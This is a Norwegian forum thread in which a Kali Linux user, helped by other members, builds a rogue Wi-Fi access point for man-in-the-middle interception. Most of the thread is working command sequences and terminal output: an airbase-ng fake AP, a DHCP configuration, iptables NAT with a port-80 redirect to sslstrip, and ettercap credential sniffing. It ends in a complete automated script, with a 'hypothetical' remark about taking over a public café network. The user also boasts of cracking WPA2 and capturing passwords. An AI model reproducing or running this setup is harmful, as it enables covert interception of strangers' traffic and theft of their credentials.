Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  21 8472
Jeg prøver å sette opp pcèn min som en ruter. Jeg får laget "FalskAP" men når noen prøver å koble til får de ikke utsendt IP adresser.
Jeg har brukt fire dager og lest meg ihel på nettett og prøvd forskjellige guider, jeg legger ved her all dokumentasjon jeg har og håper det er noen som kunne sett gjennom kodene og forklart meg hva jeg gjør feil. Setter pris på alle innspill. Jeg kjører Kali Linux.

$ ifconfig

#My internet is coming from wlan1 "inet addr:192.168.0.104 Bcast:192.168.0.255 Mask:255.255.255.0"

$ airmon-ng start wlan0
$ airbase-ng --essid "FakeAP" mon0

######This far everything is OK, I can se the "FakeAP" from other computers. But I need to asign IP`s.

#Verfiy details of logical access point interface
$ ifconfig at0

at0 Link encap:Ethernet HWaddr 10:08:b1:1e:be:b7
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)


#Create a bridge interface (To chek Iw briged at0 to wlan1 (internett) and wlan0 (mon0))
$ brctl addbr myBridge

#Now, associate real interfaces (wlan1 and at0) to bridge interfaces
#I needed to run this command to make it work: $ iw dev wlan1 set 4addr on
$ brctl addif myBridge wlan1
$ brctl addif myBridge at0

#Verfiy details of new bridge interface
$ brctl show

#bridge name bridge id STP enabled interfaces
#myBridge 8000.1008b11ebeb7 no at0
wlan1
######Looks like wlan1 (internett) and at ("FakeAP"?) are connected.

#Remove the IP address of wlan1 and at0 interfaces
$ ifconfig wlan1 0.0.0.0 up
$ ifconfig at0 0.0.0.0 up

#Assign IP address to bridge interface we have created earlier. You can use your old wlan0 IP address or assign any IP free address on your network
$ ifconfig myBridge 192.168.0.104/8 up

$ ifconfig myBridge
myBridge Link encap:Ethernet HWaddr 10:08:b1:1e:be:b7
inet addr:192.168.0.104 Bcast:192.255.255.255 Mask:255.0.0.0
inet6 addr: fe80::1208:b1ff:fe1e:beb7/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:648 (648.0 B)

######It looks like my bride has an assigned IP. The One From wlan1

#Enable IP forwarding on your computer. In other word, your computer will work as a router. IT will perform NATing.
$ echo 1 > /proc/sys/net/ipv4/ip_forward

######Try to restart "FakeAP"

$ airbase-ng --essid "FakeAP" mon0
16:06:20 Created tap interface at0
16:06:20 Trying to set MTU on at0 to 1500
16:06:20 Access Point with BSSID 10:08:B1:1E:BE:B7 started.
Error: Got channel -1, expected a value > 0.
16:06:26 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
16:06:26 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
16:06:26 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"

######And the latest lines just repeats itselves, and the computer trying to connect with dont get an IP. WHat am I doing wrong.


Below is an easy guide with dnsmasq, but i dont get it to work:

/etc/dnsmasq.config
change line 90 and 141 from-to:
#interface= - interface=at0
on line 141 just remove the "#"

airmon-ng start wlan1
airbase-ng --essid FAKE mon0
ifconfig at0 192.168.0.150 up
dnsmasq
echo 1 > /proc/sys/net/ipv4/ip_forward



EXPERIMENT:
airmon-ng start wlan1
airbase-ng --essid FAKE mon0
ifconfig at0 192.168.0.150 up
dnsmasq
brctl addbr myBridge brctl stp br0 on
iw dev wlan0 set 4addr on
brctl addif myBridge wlan0
brctl addif myBridge at0
ifconfig wlan0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig myBridge 192.168.0.104/8 up
echo 1 > /proc/sys/net/ipv4/ip_forward
for meg ser det ut til at du har kommentert koden for å sette ip adresse på nettverkskortene ie, linjen starter med #

prøv og endre dette

Kode

#Now, associate real interfaces (wlan1 and at0) to bridge interfaces
#I needed to run this command to make it work: $ iw dev wlan1 set 4addr on
$ brctl addif myBridge wlan1 
$ brctl addif myBridge at0
til dette

Kode

#Now, associate real interfaces (wlan1 and at0) to bridge interfaces
#I needed to run this command to make it work:
$ iw dev wlan1 set 4addr on
$ brctl addif myBridge wlan1 
$ brctl addif myBridge at0
edit: who post nr 1500
Sist endret av knutazz; 6. april 2015 kl. 12:19.
Det er akkuratt slik jeg kjører komandoene, jeg spesifiserer bare at jeg må kjøre "$ iw dev wlan1 set 4addr on" for at broen skal godta wlan1. Men jeg kjører alle komandoene etter hverandre.
Sist endret av utepaanordnes; 6. april 2015 kl. 13:03.
Jeg har ingen anelse om hva du prøver å oppnå, som gjerne er litt relevant i en slik post.

Men, jeg ser ikke hvor du router trafikken mellom de to interfacene. Det er ikke nok å bare opprette en nettverksbro, det opererer på lag 2. Det er også uklart om du prøver å bruke samme subnet på begge nettverkene. Netmasken du har satt er hvertfall komisk vid.
en annen ting jeg legger merke til nå når jeg leser igjennom en gang til er at den posten du la ut ser ut som copy \ paste direkte fra en guide og ikke config filene dine,

uansett, hva og hvorfor ønsker du et sånt oppsett med kali? hvis du bare ønsker en router med ap hvorfor ikke bruke noe som pfSense?

kom gjerne med litt mer utfylede info om hva du prøver å få til så blir det litt lettere for oss å hjelpe
Jeg forsøker å lage ett Rouge AP som det står i tittelfeltet.
Jeg bruker wlan0 til å koble til internett og wlan1 til å lage ett ett falskt Acces Point, eller en Honneypot om du vil.
Slik at maskinen sitter mellom internett og tilkobler og kan sniffe trafikken.

Man-in-the-middle attack

De fleste komandoene og noe av beskrivelsene har jeg tatt direkte fra en guide, men har skrevet den litt om og lagt med responsen fra terminalen min når komandoene er kjørt.
Finner ikke igjen orginalsiden guiden lå på. Men det må da vere noen her som forstår seg på dette. Det er første gangen jeg prøver å bridge noe, så vet ikke om jeg gjør det riktig eller om jeg burde gjort det på en helt annen måte.

-Jeg oppretter ett acces point som heter "FakeAP"
-Jeg kan se det fra andre maskiner men kan ikke koble til siden det ikke distribuerer IP adresser enda.
-Derfor bridger jeg at0 (FakeAP) til wlan1 (internett).
-Så assigner jeg en IP til broen
-Og kjører en komando som enabler IP forwarding.
-Men maskinene som prøver å koble seg på får femdelest ikke noen IP.

Har snart brukt en uke på å lese guider, men siden jeg ikke forstår hvordan dette fungerer er det ikke så lett.

Vet det er ett program som heter "Gerix" som skal kunne lage falske acces point, men har aldrig fått det til å virke.

Takk for responsen, ser jeg kunne gjort en bedre beskrivelse av problemet mitt. Regnte med det sa seg selv
Sist endret av utepaanordnes; 7. april 2015 kl. 14:07. Grunn: Automatisk sammenslåing med etterfølgende innlegg.
DHCP-serveren står jo på andre siden av wlan0. Den vil jo ikke kunne se forskjell på deg og de klientene du prøver å route til den, siden du forsøker å opptre som en NAT-ruter selv. Du må derfor sette opp din egen DHCP-server, distribuere disse til de som kobler til, og maskere adressene som deg før de går til wlan0.

Hvis du hadde koblet direkte til ruteren med kabel hadde du kunne du kanskje ha unngått dette, avhengig av programvaren du bruker.
Ikke for å komme med noen moralprekener eller noe sånt, men du er klarover lovligheten av det du prøver å få til hvis dette ikke er på et eget nettverk du eier? måtte bare få det ut av veien...

Siden vi går utifra at dette er bare for læring og gøy i eget test nettverk så blir det som Dyret påpeker det mangler routing mellom nettverkene, eventuelt hvis det skal være på samme subnet dhcp forwarder
Sitat av knutazz Vis innlegg
Ikke for å komme med noen moralprekener eller noe sånt, men du er klarover lovligheten av det du prøver å få til hvis dette ikke er på et eget nettverk du eier? måtte bare få det ut av veien...

Siden vi går utifra at dette er bare for læring og gøy i eget test nettverk så blir det som Dyret påpeker det mangler routing mellom nettverkene, eventuelt hvis det skal være på samme subnet dhcp forwarder
Vis hele sitatet...
Dette fåregår på eget nettverk og er kunn for læring, og å ha noe å knote med.
Jeg vet hva jeg vil oppnå men aner ikke hvordan, jeg skjønner hva dere skriver men er ikke kapabel til å utføre det.
Alt jeg kan om Linux er stort sett selvlært, Jeg kjenner ingen som hadde klart å instalere en fersk Linux distro engang. Så jeg har ingen kamerater å be om hjelp.

Jeg er lei av alt knotet. Hvist det er noen som kunne tatt seg tid til å lage en kort gude jeg hadde klart og følge, er jeg gladelig villig til å betale for det. (vist ikke det er ulovelig å ta betalt for slikt da).

Jeg starter på 500,- ser ikke for meg at det er altfor komplisert vist man først er en Linux guru.

Nå må jeg ut en tur, ser koder når jeg lukker øynene og blir bare mer frustrert, så må klarne tankene litt.
Nå er ikke jeg heller noen Linux guru, men det du sliter med nå har ingenting med Linux å gjøre foruten om praktisk nettverskonfigurasjon av distroen du bruker.

Dette er et rent nettverks "problem" og man må kunne litt "kjedelig" teori om hvordan ting snakker sammen og virker i nettverks verden for å få dette til å funke

Fikk nesten litt lyst til å prøve på dette selv, bare synd at jeg ikke har en maskin jeg kan prøve meg på

Den IPen du satte her:
#Assign IP address to bridge interface we have created earlier. You can use your old wlan0 IP address or assign any IP free address on your network
$ ifconfig myBridge 192.168.0.104/8 up

Er dette noe du valgte helt tilfeldig eller var det IPen til wlan0 kortet dit? og var det 8 bit nettverksmaske?
var outputen fra ifconfig wlan0 = IP 192.168.0.104, Netmask 255.0.0.0

Eller var det vanlig 24 bit nettverksmaske: ifconfig wlan0 = IP 192.168.0.104, Netmask 255.255.255.0
Sist endret av knutazz; 7. april 2015 kl. 17:03. Grunn: Automatisk sammenslåing med etterfølgende innlegg.
▼ ... noen måneder senere ... ▼
Det tok en tid, men nå tror jeg jeg har det :P
Men pcèn min er til reperasjon, så sitter på en HP Stream 11 uten eth0 og driveren til det interne netverkskortet fungerer ikke under denne kernelen, så har bare ett eksternt kort og ikke mulighet til å teste før senere i uken når jeg får tilbake laptoppen min.

Men her er scriptet iallefall, jeg har funnet det på nett og tar ingen credits for det, men jeg har gjort noen små endringer.

KILDEN:https://forums.kali.org/showthread.p...ercap-sslstrip


gedit /etc/dhcp/dhcpd.conf
######################################
authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "FakeAP";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}
##############################################
airmon-ng check kill

airmon-ng start wlan0 11

airbase-ng -c 11 -e FakeAP wlan0mon
NEW TERMINAL:
ifconfig at0 10.0.0.1 netmask 255.255.255.0

ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1

iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0

/etc/init.d/isc-dhcp-server start
##############################################
sslstrip -f -p -k 10000

ettercap -p -u -T -q -i at0
Ved første øyekast ser dette mye bedre og riktig ut
Hva er det du prøver å oppnå? Skal du utføre man in the middle angrep, tukle med routing og slikt, eller skal du bare lese av trafikken? Du overkompliserer hvertfall alt ekstremt om du bare skal lese trafikken, da alt du trenger er en nettverksbro og mirror port.
Sitat av knutazz Vis innlegg
Ved første øyekast ser dette mye bedre og riktig ut
Vis hele sitatet...
Takk for det Det tok meg noen gode uker med intensiv søkning og har lært meg mye nytt i Kali siden jeg startet denne posten, som å knekke WPS-PIN med reaver, få handshakes fra rutere og bruteforce WPA2 on-the-fly med crunch og aircrack-ng. Ettercap har jeg testet tidligere mot en Windows-XP maskin og fikk passord og alt jeg var ute etter, men det var Win-XP som sagt :P
Så gleder meg til å få tilbake maskinen min og teste det.

Sitat av Deezire Vis innlegg
Hva er det du prøver å oppnå? Skal du utføre man in the middle angrep, tukle med routing og slikt, eller skal du bare lese av trafikken? Du overkompliserer hvertfall alt ekstremt om du bare skal lese trafikken, da alt du trenger er en nettverksbro og mirror port.
Vis hele sitatet...
Jeg er ute etter ett man-in-the-midle-atack ja. Kom gjerne med redigeringer vist du/dere har forslag
EDIT:
Fikk det interne netverkskorter til å fungere på min HP Stream 11, men det kan ikke settest i monitor-mode (forbanna dritt kort, men pcèn kostet meg bare 2100:P).
Fikk tilbakemelding fra expert at min egentlige pc er på vei tilbake fra verkstedet, så den er her iløpet av neste uke
Trigonoceps occipita
vidarlo's Avatar
Donor
Sitat av Dyret Vis innlegg
DHCP-serveren står jo på andre siden av wlan0. Den vil jo ikke kunne se forskjell på deg og de klientene du prøver å route til den, siden du forsøker å opptre som en NAT-ruter selv. Du må derfor sette opp din egen DHCP-server, distribuere disse til de som kobler til, og maskere adressene som deg før de går til wlan0.
Vis hele sitatet...
Eg må sei at eg forstår ikkje oppsettet her. Bridge kort - køyre eigen DHCP og NAT? Bridger du kort vil jo det opptre som ein switch, der pakker vert forwarda direkte, utan NATing. NATing vil jo vere noko heilt anna?
Sitat av slashdot Vis innlegg
Eg må sei at eg forstår ikkje oppsettet her. Bridge kort - køyre eigen DHCP og NAT? Bridger du kort vil jo det opptre som ein switch, der pakker vert forwarda direkte, utan NATing. NATing vil jo vere noko heilt anna?
Vis hele sitatet...
Les seks poster opp, og se om det gir mer mening, første delen av posten er bare til å overse, det var først for noen dager siden jeg fant løsningen, tror jeg. Har ikke maskin til å teste med akkurat nå.

Vist det er noen andre som kjører Kali 2.0 og kunne tenkt seg å prøve ut kodene ville jeg sotte stor pris på tilbakemeldinger.

Her er det jeg har komt fram til:
######################################

gedit /etc/dhcp/dhcpd.conf
######################################
authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "FakeAP";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}
##############################################
airmon-ng check kill (tror ikke denne komandoen er nødvendig)).

airmon-ng start wlan0 11

airbase-ng -c 11 -e FakeAP wlan0mon
NEW TERMINAL:
ifconfig at0 10.0.0.1 netmask 255.255.255.0

ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1

iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0

/etc/init.d/isc-dhcp-server start
##############################################
sslstrip -f -p -k 10000

ettercap -p -u -T -q -i at0

Jeg får det falske APèt til å virke, jeg kan koble meg på og får Ip-adresse.

Men jeg må kjøre "#airmon-ng check kill" for at "#airbase-ng -c 11 -e FakeAP wlan0mon" skal fungere.
Da stenger airmon-ng wlan0 og wlan2 og bruker wlan0 til ruter (wlan0mon)
Men jeg kommer meg ikke på nett igjen etter jeg kjører "#ifconig wlan2 up" for å koble tilbake den interne ruteren.

Jeg er lost igjen.
Men mye nermere en før, for serveren fungerer ialefal og tar imot klienter og fordeler IP-adresser.

Hva mer må jeg gjøre etter "ifconfig wlan2 up" for å få nettilgang?

"ifconfig wlan2 up" burde koble meg på nett igjen, det gjør den uten problem på Mint maskinen min.
Så det er aimon-ng check kill som ødelegger ett eller annet. Jeg ser wlan0mon, lo og wlan2 når jeg skriver "ifconfig"

Jeg sletter network-manager-gnome og instalerte wicd-gtk.

Nå får jeg sotte opp "Fake AP", jeg har nettilgang på dataen, jeg kan koble meg til med Samsungen min, men jeg får ikke nett til enhetene. De er koblet på og har fått ipadresse, men ikke nett.

Nå får jeg sotte opp "Fake AP", jeg har nettilgang på dataen, jeg kan koble meg til med en Samsungen telefon og en ekstra data, men jeg får ikke nett til enhetene. De er koblet på og har fått ipadresse, men ikke nett.

Her er loggen min:
VINDU1:
root@kali:~# airbase-ng -c 11 -e FakeAP wlan0mon
20:46:28 Created tap interface at0
20:46:28 Trying to set MTU on at0 to 1500
20:46:28 Trying to set MTU on wlan0mon to 1800
20:46:28 Access Point with BSSID 34:21:09:0C:59:CF started.
20:48:03 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
20:48:03 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
20:48:03 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
20:48:03 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
20:48:03 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
20:48:03 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
20:54:18 Client 00:17:C4:72:60:AA associated (unencrypted) to ESSID: "FakeAP"
20:54:18 Client 00:17:C4:72:60:AA associated (unencrypted) to ESSID: "FakeAP"
20:54:18 Client 00:17:C4:72:60:AA associated (unencrypted) to ESSID: "FakeAP"

VINDU2:
root@kali:~# ifconfig at0 10.0.0.1 netmask 255.255.255.0
root@kali:~# ifconfig at0 mtu 1400
root@kali:~# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
root@kali:~# iptables --flush
root@kali:~# iptables --table nat --flush
root@kali:~# iptables --delete-chain
root@kali:~# iptables --table nat --delete-chain
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~# iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
root@kali:~# iptables -P FORWARD ACCEPT
root@kali:~# iptables --append FORWARD --in-interface at0 -j ACCEPT
root@kali:~# iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
root@kali:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
root@kali:~# dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
Internet Systems Consortium DHCP Server 4.3.1
Copyright 2004-2014 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Config file: /etc/dhcp/dhcpd.conf
Database file: /var/lib/dhcp/dhcpd.leases
PID file: /var/run/dhcpd.pid
Wrote 2 leases to leases file.
Listening on LPF/at0/34:21:09:0c:59:cf/10.0.0.0/24
Sending on LPF/at0/34:21:09:0c:59:cf/10.0.0.0/24
Sending on Socket/fallback/fallback-net
root@kali:~# /etc/init.d/isc-dhcp-server start
[ ok ] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.service.
root@kali:~#





Er det åpenlyst for nioen hvorfor enhetene ikke får internett? Jeg må legge meg, skal i dåp i morgen,

Leste over terminal kodene nå i morges. Det viser seg at jeg har prøvd å route trafikken til wlan1 som ikke eksisterer :P Jeg har wlan0 og wlan2.
Glemte å ta med det trådløse netverkskortet, men skal prøve på nytt i kveld.

Tror det skal virke nå.
Sist endret av utepaanordnes2; 13. september 2015 kl. 11:30. Grunn: Automatisk sammenslåing med etterfølgende innlegg.
Det virker Latterkick. Send meg en pm vist det er noe dere lurer på
Det tok meg nesten bare fem måneder :P

Synest det er litt rart at ikke flere tok intresse av dette. Med tanke på at politiet bruker falske basestasjoner (http://www.dagbladet.no/2014/12/15/n...ynet/36743810/), liker iallefall jeg å vite hvordan teknologien virker.

Håper bare ikke politiet har betalt i dyre dommer for utstyret, når alt du trenger er en laptop til 4000, USB-wifi og en dorlig betalt 18åring :P
Men skal demonstrere dette for noen av vennene mine, bruker ikke smartphone selv, men regner med det er mange som har wifi-en på og kobler seg til usikre nett for diverse.
Sist endret av utepaanordnes2; 14. september 2015 kl. 00:04. Grunn: Automatisk sammenslåing med etterfølgende innlegg.
Sitat av utepaanordnes2 Vis innlegg
Håper bare ikke politiet har betalt i dyre dommer for utstyret, når alt du trenger er en laptop til 4000, USB-wifi og en dorlig betalt 18åring :P
Men skal demonstrere dette for noen av vennene mine, bruker ikke smartphone selv, men regner med det er mange som har wifi-en på og kobler seg til usikre nett for diverse.
Vis hele sitatet...
De falske basestasjonene politiet benytter er for mobiltelefoner, ikke Wi-Fi. Disse trenger heller ikke være særlig dyre, men de må ha ganske OK signalstyrke for at mobiler i nærheten skal gidde å ta de i bruk. De har også noe annerledes plasseringsbehov, og må gjerne stå ute i snø og regn - året rundt. Da er det ofte greit å betale noen for noe som virker.
Sist endret av Dyret; 14. september 2015 kl. 08:42.
Sitat av Dyret Vis innlegg
De falske basestasjonene politiet benytter er for mobiltelefoner, ikke Wi-Fi. Disse trenger heller ikke være særlig dyre, men de må ha ganske OK signalstyrke for at mobiler i nærheten skal gidde å ta de i bruk. De har også noe annerledes plasseringsbehov, og må gjerne stå ute i snø og regn - året rundt. Da er det ofte greit å betale noen for noe som virker.
Vis hele sitatet...
Men er du skeptidk til de falske base-stasjonene de plaserer rundt om kring uten å opplyse om det? De kan jo sniffe passord all trafikk, wifi passord osv. Jeg mener iallefall ikke det er riktig, det er jo ulovlig overvåkning, eller?
Sist endret av utepaanordnes2; 14. september 2015 kl. 21:17.
Jeg tror ikke du helt har skjønt hva en falsk basestasjon er, og hva de kan brukes til. Det politiet setter opp er falske basestasjoner for GSM-nettet og har ingenting med WLAN å gjøre. Det er vidt forskjellige bruksområder og frekvenser. Det er sant at prisen de betaler for utstyret er langt over kostnaden av komponenter i seg selv, men det dekker også utvikling av programvare og support.

I dag er det alt for mange mekanismer som vil hindre deg fra å hente ut noe særlig med relevant informasjon. Facebook, Google, Snapchat, Instagram, og så alle andre relevante tjenester har autentisering og dataoverføring over en sikker tilkobling. Det er nesten uten unntak kun uinteressante nettsteder som sender data over en åpen kanal.
▼ ... over et år senere ... ▼
Jeg var jo helt ute å kjøre, her er det endelige produktet jeg endte opp med:
____________________________________________________________ ___________________
#!/bin/sh

airmon-ng start wlan0 11

airbase-ng -c 11 -e FakeAP wlan0mon

gnome-terminal

ifconfig at0 10.0.0.1 netmask 255.255.255.0

ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 #(route -n)

iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0

/etc/init.d/isc-dhcp-server start

gnome-terminal

sslstrip -f -p -k 10000

gnome-terminal

ettercap -p -u -T -q -i at0
____________________________________________________________ ___________________
Husk å :
$ chmod +x "navn-på-fil"
$ ./navn-på-fil.sh


Ett automatisk skript som lager en "hotspot" på maskinen, rent hypotetisk kan du sette deg på Macken med en laptop, 2 netverkskort, overta nettet og sørge for at all trafikken går gjennom din maskin. Jeg har ikke teste dette andre steder en hjemme og det er lenge siden, vet ikke om sslstrip og ettecap virker som de skal.